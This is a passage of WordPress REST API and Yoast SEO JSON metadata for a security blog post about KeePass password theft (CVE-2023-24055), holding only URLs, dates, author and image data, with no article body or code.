type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/keepass-passwords-theft-cve-2023-240550-240551#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/04\\\/keepass-passwords-theft-cve-2023-240550\\\/\"},\"author\":{\"name\":\"versionpan\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/103ffe36f7fd34a1cc126a30431b94d8\"},\"headline\":\"KeePass Passwords Theft CVE-2023-240550\",\"datePublished\":\"2023-04-03T04:00:26+00:00\",\"dateModified\":\"2024-09-13T08:31:22+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/04\\\/keepass-passwords-theft-cve-2023-240550\\\/\"},\"wordCount\":1325,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/keepass-passwords-theft-cve-2023-240550-240551#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cleplsevb0h820kqw8a70euzn.png?tr=w-1800,c-at_max\",\"keywords\":[\"vRx\",\"2023\"],\"articleSection\":[\"vRx\",\"2023\",\"Press Release\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/keepass-passwords-theft-cve-2023-240550-240551#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/04\\\/keepass-passwords-theft-cve-2023-240550\\\/\",\"url\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/keepass-passwords-theft-cve-2023-240550-240551\",\"name\":\"KeePass Passwords Theft CVE-2023-240550 - Version 2\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/keepass-passwords-theft-cve-2023-240550-240551#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/keepass-passwords-theft-cve-2023-240550-240551#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cleplsevb0h820kqw8a70euzn.png?tr=w-1800,c-at_max\",\"datePublished\":\"2023-04-03T04:00:26+00:00\",\"dateModified\":\"2024-09-13T08:31:22+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/keepass-passwords-theft-cve-2023-240550-240551#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/keepass-passwords-theft-cve-2023-240550-240551\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/keepass-passwords-theft-cve-2023-240550-240551#primaryimage\",\"url\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cleplsevb0h820kqw8a70euzn.png?tr=w-1800,c-at_max\",\"contentUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cleplsevb0h820kqw8a70euzn.png?tr=w-1800,c-at_max\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/keepass-passwords-theft-cve-2023-240550-240551#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"KeePass Passwords Theft CVE-2023-240550\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"name\":\"Version 2\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/version-2.com\\\/zh\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\",\"name\":\"Version 2\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"width\":1795,\"height\":335,\"caption\":\"Version 2\"},\"image\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/103ffe36f7fd34a1cc126a30431b94d8\",\"name\":\"versionpan\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"caption\":\"versionpan\"},\"url\":\"https:\\\/\\\/version-2.com\\\/en\\\/author\\\/versionpan\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"KeePass Passwords Theft CVE-2023-240550 - Version 2","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551","og_locale":"en_US","og_type":"article","og_title":"KeePass Passwords Theft CVE-2023-240550 - Version 2","og_description":"Introduction CVE-2023-24055 is a vulnerability discover [&hellip;]","og_url":"https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551","og_site_name":"Version 2","article_published_time":"2023-04-03T04:00:26+00:00","article_modified_time":"2024-09-13T08:31:22+00:00","og_image":[{"url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cleplsevb0h820kqw8a70euzn.png?tr=w-1800,c-at_max","type":"","width":"","height":""}],"author":"versionpan","twitter_card":"summary_large_image","twitter_misc":{"Written by":"versionpan"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551#article","isPartOf":{"@id":"https:\/\/version-2.com\/2023\/04\/keepass-passwords-theft-cve-2023-240550\/"},"author":{"name":"versionpan","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/103ffe36f7fd34a1cc126a30431b94d8"},"headline":"KeePass Passwords Theft CVE-2023-240550","datePublished":"2023-04-03T04:00:26+00:00","dateModified":"2024-09-13T08:31:22+00:00","mainEntityOfPage":{"@id":"https:\/\/version-2.com\/2023\/04\/keepass-passwords-theft-cve-2023-240550\/"},"wordCount":1325,"commentCount":0,"publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cleplsevb0h820kqw8a70euzn.png?tr=w-1800,c-at_max","keywords":["vRx","2023"],"articleSection":["vRx","2023","Press Release"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551#respond"]}]},{"@type":"WebPage","@id":"https:\/\/version-2.com\/2023\/04\/keepass-passwords-theft-cve-2023-240550\/","url":"https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551","name":"KeePass Passwords Theft CVE-2023-240550 - Version 2","isPartOf":{"@id":"https:\/\/version-2.com\/zh\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551#primaryimage"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cleplsevb0h820kqw8a70euzn.png?tr=w-1800,c-at_max","datePublished":"2023-04-03T04:00:26+00:00","dateModified":"2024-09-13T08:31:22+00:00","breadcrumb":{"@id":"https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551#primaryimage","url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cleplsevb0h820kqw8a70euzn.png?tr=w-1800,c-at_max","contentUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cleplsevb0h820kqw8a70euzn.png?tr=w-1800,c-at_max"},{"@type":"BreadcrumbList","@id":"https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/version-2.com\/zh\/"},{"@type":"ListItem","position":2,"name":"KeePass Passwords Theft CVE-2023-240550"}]},{"@type":"WebSite","@id":"https:\/\/version-2.com\/zh\/#website","url":"https:\/\/version-2.com\/zh\/","name":"Version 2","description":"","publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/version-2.com\/zh\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/version-2.com\/zh\/#organization","name":"Version 2","url":"https:\/\/version-2.com\/zh\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","contentUrl":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","width":1795,"height":335,"caption":"Version 2"},"image":{"@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/103ffe36f7fd34a1cc126a30431b94d8","name":"versionpan","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","caption":"versionpan"},"url":"https:\/\/version-2.com\/en\/author\/versionpan\/"}]}},"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbQRKm-h2P","jetpack_featured_media_url":"","post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/posts\/65523","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/users\/148637484"}],"replies":[{"embeddable":true,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/comments?post=65523"}],"version-history":[{"count":6,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/posts\/65523\/revisions"}],"predecessor-version":[{"id":69392,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/posts\/65523\/revisions\/69392"}],"wp:attachment":[{"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/media?parent=65523"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/categories?post=65523"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/tags?post=65523"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}